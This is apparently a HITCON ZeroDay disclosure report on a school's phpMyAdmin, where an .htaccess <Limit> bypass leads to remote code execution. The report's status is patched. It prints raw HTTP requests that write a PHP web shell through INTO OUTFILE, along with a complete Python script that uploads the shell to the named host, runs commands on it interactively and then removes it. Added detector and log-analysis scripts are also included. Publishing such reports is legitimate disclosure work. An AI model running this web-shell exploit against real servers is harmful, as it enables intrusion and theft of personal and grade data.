國立宜蘭高級中學 (National Yilan Senior High School): SQL injection leading to RCE - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2021-00213
  • Vendor: TACERT台灣學術網路危機處理中心 (Taiwan Academic Network Computer Emergency Response Team)
  • Title: 國立宜蘭高級中學 (National Yilan Senior High School): SQL injection leading to RCE
  • Introduction: an access-control problem in phpMyAdmin allows arbitrary SQL queries to be run, which in turn leads to RCE

Handling Status

Current status: Published
Last Update : 2021/05/01
  • New submission
  • Reviewed
  • Reported
  • Patched
  • Retested
  • Published

Handling History

  • 2021/04/21 21:34:47 : New submission (status updated by entroy)
  • 2021/04/21 23:12:21 : Review completed (status updated by the HITCON ZeroDay service team)
  • 2021/04/23 13:58:51 : Patching in progress (status updated by the HITCON ZeroDay service team)
  • 2021/04/27 11:21:40 : Retest requested (status updated by the HITCON ZeroDay service team)
  • 2021/04/27 11:35:29 : Fix confirmed (status updated by entroy)
  • 2021/05/01 03:00:05 : Published (updated automatically by the HITCON ZeroDay platform)

Details

  • ZDID: ZD-2021-00213
  • Reporter: entroy (entroy)
  • Risk: High
  • Type: Remote Code Execution

References

An attacker can use this vulnerability to gain full control of the host, write arbitrary files, and obtain a large amount of internal network information.

Vulnerability description: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection

Vulnerability description: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection

Vulnerability description: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html

Vulnerability description: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(This field is generated automatically by the system from the vulnerability category and is provided as reference material.)

Related URLs

http://xms.ylsh.ilc.edu.tw/

Description

phpMyAdmin is protected with an .htaccess file.
Using any HTTP method other than those listed in its <Limit> section bypasses the protection; the method I used was GETS.
.htaccess:

AuthName PhpMyAdmin
AuthType Basic
AuthUserFile "C:/XMS/www/phpMyAdmin/.htpasswd"
<Limit GET PUT POST>
require user sysop
</Limit>
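The <Limit> section above is the root of the bypass: Apache applies directives inside <Limit GET PUT POST> only to those three method names, so a request carrying any other method string reaches phpMyAdmin without authentication. The checker below is an added example written for this page; it is not the reporter's code and not part of phpMyAdmin or the XMS site. It parses an .htaccess fragment and flags access-control directives that are scoped by <Limit> or <LimitExcept>. Both sample configurations are constructed here: the weak one reproduces the pattern from the report, the hardened one keeps Require user sysop at file scope so it applies to every method.

```python
import re

# Constructed samples. WEAK mirrors the .htaccess in the report; HARDENED is
# the corrected form with the Require directive outside any <Limit> block.
WEAK_HTACCESS = """\
AuthName PhpMyAdmin
AuthType Basic
AuthUserFile "C:/XMS/www/phpMyAdmin/.htpasswd"
<Limit GET PUT POST>
require user sysop
</Limit>
"""

HARDENED_HTACCESS = """\
AuthName PhpMyAdmin
AuthType Basic
AuthUserFile "C:/XMS/www/phpMyAdmin/.htpasswd"
Require user sysop
"""

# Directives that decide who may access the resource (Apache 2.2 and 2.4 forms).
AUTHZ_DIRECTIVES = {"require", "order", "allow", "deny", "satisfy"}

SECTION_OPEN = re.compile(r"<(Limit|LimitExcept)\s+([^>]+)>", re.IGNORECASE)
SECTION_CLOSE = re.compile(r"</(Limit|LimitExcept)>", re.IGNORECASE)


def find_limit_scoped_authz(htaccess_text):
    """Return (line_no, directive_line, section_kind, methods) for every
    access-control directive that sits inside <Limit> or <LimitExcept>.

    Inside <Limit A B>, the directive only governs methods A and B; any other
    method name is not subject to it at all. <LimitExcept> is the mirror image
    and leaves the listed methods unprotected instead.
    """
    findings = []
    section = None  # (kind, methods) while inside a section, else None
    for line_no, raw in enumerate(htaccess_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        opened = SECTION_OPEN.match(line)
        if opened:
            section = (opened.group(1), tuple(opened.group(2).split()))
            continue
        if SECTION_CLOSE.match(line):
            section = None
            continue
        directive = line.split()[0].lower()
        if section is not None and directive in AUTHZ_DIRECTIVES:
            findings.append((line_no, line, section[0], section[1]))
    return findings


def is_auth_bypassable(htaccess_text):
    """True when some access-control directive is only partially applied."""
    return bool(find_limit_scoped_authz(htaccess_text))


if __name__ == "__main__":
    for name, text in (("weak", WEAK_HTACCESS), ("hardened", HARDENED_HTACCESS)):
        print(name, "bypassable:", is_auth_bypassable(text))
        for line_no, line, kind, methods in find_limit_scoped_authz(text):
            print(f"  line {line_no}: '{line}' only applies inside <{kind} {' '.join(methods)}>")
```

Run the script on a real .htaccess by passing its contents to find_limit_scoped_authz; the Apache documentation itself advises against placing access-control directives inside <Limit> for exactly this reason, and the same partial-coverage problem applies to <LimitExcept>, so the checker flags both.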

I then found that privileges had not been restricted, so the session simply ran with root@localhost privileges.
I tried directly:

select "<?php phpinfo();?>" INTO OUTFILE "c:\\路徑\\shell.php"

It turned out there was no permission to write, and I got the following message:

Access denied for user 'root'@'localhost'

Referring to https://stackoverflow.com/questions/17975120/access-denied-for-user-rootlocalhost-using-password-yes-no-privileges
I found that the user root was missing an authentication_string, so I added the column and the data directly; I sent the requests with Burp.
Add the column:

GETS /phpmyadmin/sql.php?lang=utf-8&convcharset=iso-8859-1&server=1&db=mysql&sql_query=ALTER+TABLE+user+add+COLUMN+authentication_string+VARCHAR(15)&goto=main.php HTTP/1.1
Host: xms.ylsh.ilc.edu.tw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=916d8b77d4260195ae71358a792f6829
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 0

Write the data:

UPDATE user SET authentication_string=password('password') WHERE user='root'

Reload the privileges:

FLUSH PRIVILEGES;

After that, writing files works:

GETS /phpmyadmin/sql.php?lang=utf-8&convcharset=iso-8859-1&server=1&db=mysql&sql_query=select+%22%3C%3Fphp%20if%28isset%28%24_POST%5B%27cmd%27%5D%29%29%20%7Bsystem%28%24_POST%5B%27cmd%27%5D%29%3B%7D%20%3F%3E%22%20INTO%20OUTFILE%20%22c%3A%5C%5CXMS%5C%5Cwww%5C%5Cxms%5C%5C4eff2c041976ea22afb7092a53188c70.php%22&goto=main.php HTTP/1.1
Host: xms.ylsh.ilc.edu.tw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=916d8b77d4260195ae71358a792f6829
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 0
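Both requests above leave a clear trace in the web server's access log: the request method is a string Apache does not recognise, and the sql_query parameter carries INTO OUTFILE with a path under the web root. The script below is an added example, not code from the report or from any of the projects involved. It runs over constructed Apache combined-format log lines (placeholder addresses and no real host name) and flags requests to /phpmyadmin/ that use a non-standard HTTP method, that were answered 200 despite that, or whose decoded sql_query writes a file with INTO OUTFILE or INTO DUMPFILE.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines. Addresses, timestamps and the
# file name are placeholders; the query strings follow the shape of the
# requests in the report but write only a harmless literal.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Apr/2021:21:30:01 +0800] "GET /phpmyadmin/index.php HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.0.0.5 - - [21/Apr/2021:21:30:07 +0800] "GETS /phpmyadmin/sql.php?server=1&db=mysql&sql_query=ALTER+TABLE+user+add+COLUMN+authentication_string+VARCHAR(15)&goto=main.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [21/Apr/2021:21:31:12 +0800] "GETS /phpmyadmin/sql.php?server=1&db=mysql&sql_query=select+%221%22+INTO+OUTFILE+%22c%3A%5C%5CXMS%5C%5Cwww%5C%5Cxms%5C%5Cx.php%22&goto=main.php HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
10.0.0.9 - sysop [21/Apr/2021:21:40:00 +0800] "POST /phpmyadmin/sql.php HTTP/1.1" 200 6011 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) '
)
KNOWN_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH", "TRACE", "CONNECT"}
FILE_WRITE_RE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\b", re.IGNORECASE)


def analyze_line(line):
    """Parse one log line and return a dict with a list of reasons it is
    suspicious (empty list means nothing was found); None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, target, status = m.group("method"), m.group("target"), m.group("status")
    reasons = []

    # A method name outside the HTTP set is the signature of the <Limit> bypass.
    if method.upper() not in KNOWN_METHODS:
        reasons.append(f"non-standard method {method}")
        if status == "200":
            reasons.append("non-standard method was served (200) instead of rejected")

    # Decode the query string the way phpMyAdmin would and inspect sql_query.
    parts = urlsplit(target)
    if parts.path.lower().startswith("/phpmyadmin/"):
        for sql in parse_qs(parts.query).get("sql_query", []):
            hit = FILE_WRITE_RE.search(sql)
            if hit:
                reasons.append(f"sql_query writes a file via {hit.group(0)}")

    return {"ip": m.group("ip"), "method": method, "target": parts.path,
            "status": status, "reasons": reasons}


def find_suspicious(log_text):
    """Return the analysed records that have at least one reason."""
    hits = []
    for line in log_text.splitlines():
        record = analyze_line(line)
        if record and record["reasons"]:
            hits.append(record)
    return hits


if __name__ == "__main__":
    for record in find_suspicious(SAMPLE_LOG):
        print(f"{record['ip']} {record['method']} {record['target']} -> {record['status']}")
        for reason in record["reasons"]:
            print("   ", reason)
```

On the server side the two mitigations are independent of each other: keep the Require directive outside any <Limit> section so every method is authenticated, and make sure the account phpMyAdmin connects as is not root and does not hold the FILE privilege. MySQL's secure_file_priv variable adds a second barrier: set to a directory it confines INTO OUTFILE to that directory, and set to NULL it disables file import and export altogether.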

Full Python script:

import requests
import subprocess
import time
import hashlib
import sys
import os

def getCommandResult(command):
    # Run a shell command and wait for it to finish; its output is discarded.
    p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, close_fds=True)
    p.communicate()

def get_filename():
    # Derive a file name from the current time so each run uses a new name.
    m = hashlib.md5()
    data = str(time.time())
    m.update(data.encode('utf-8'))
    return m.hexdigest()

def upload_webshell():
    filename = get_filename()
    getCommandResult('''curl -X GETS 'http://xms.ylsh.ilc.edu.tw/phpmyadmin/sql.php/?lang=utf-8&convcharset=iso-8859-1&server=1&db=mysql&sql_query=select+%22%3C%3Fphp%20if%28isset%28%24_POST%5B%27cmd%27%5D%29%29%20%7Bsystem%28%24_POST%5B%27cmd%27%5D%29%3B%7D%20%3F%3E%22%20INTO%20OUTFILE%20%22c%3A%5C%5CXMS%5C%5Cwww%5C%5Cxms%5C%5C{}.php%22' -v'''.format(filename))
    time.sleep(1)
    # Confirm the written file is reachable through the web server.
    if requests.get('http://xms.ylsh.ilc.edu.tw/xms/{}.php'.format(filename)).status_code != 200:
        return False
    return filename

def webshell(filename):
    print('q or ctrl^c to quit')
    print('=========================== webshell ===========================')

    url = 'http://xms.ylsh.ilc.edu.tw/xms/{}.php'.format(filename)
    while True:
        cmd = input()
        if cmd == 'q':
            break

        data = {
            'cmd': cmd
        }
        result = requests.post(url, data=data)
        result.encoding = 'big5'
        print(result.text)

def del_webshell(filename):
    # Remove the uploaded file again once the session ends.
    print('deleting webshell ... ')

    url = 'http://xms.ylsh.ilc.edu.tw/xms/{}.php'.format(filename)
    cmd = 'del {}.php /f'.format(filename)
    data = {
        'cmd': cmd
    }
    requests.post(url, data=data)

def main():
    print('Uploading webshell ... ')
    filename = upload_webshell()
    try:
        if not filename:
            print('Upload webshell failed ... ')
            sys.exit()
        webshell(filename)
        del_webshell(filename)
    except KeyboardInterrupt:
        print('Interrupted')
        try:
            del_webshell(filename)
        except SystemExit:
            os._exit(0)

if __name__ == "__main__":
    main()

Once inside, I found personal data of students and teachers as well as grade-related data.

Screenshots
